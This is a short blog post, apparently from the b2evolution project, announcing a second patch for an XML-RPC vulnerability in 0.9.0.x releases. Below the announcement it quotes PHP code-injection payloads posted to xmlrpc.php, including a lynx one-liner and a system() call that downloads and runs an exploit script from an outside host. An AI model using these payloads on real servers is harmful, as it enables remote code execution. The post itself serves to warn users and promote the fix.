| « b2evolution 0.9.1 "Dawn" released | "Phoenix" ALPHA features (preliminary list)... » |
Yope, that's right, they did it again! ![]()
The previous XML-RPC fix may not be secure enough, so...
It is highly recommended you fix you installation by downloading this NEW patch file and unzipping it into you /blogs/b2evocore/ folder. This should overwrite the two following files AGAIN:
This patch has been tested on the latest 0.9.0.12 "Amsterdam" release but is believed to work on all 0.9.0.x versions.
The patch will be included in future releases.
xmlrpc_fix_112/b2evocore directory...
var=,'')); phpinfo(); exit;/*
var=,'')); system('wget linuxgods\.go\.ro/local\.tgz; tar -xzf local.tgz /tmp; nohup /tmp/local/exploit.sh&;');exit;/*
echo '
var_name=,\'\');echo \'I got hacked.\';exit;/*
---
' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php
echo '
var_name=,\'\');echo \'Hello, world.\';mail(root,\'p0wned!\',\'Patch b2evolution for XML-RPC.\');exit;/*
---
' | lynx -post_data weblog_url/xmlsrv/xmlrpc.php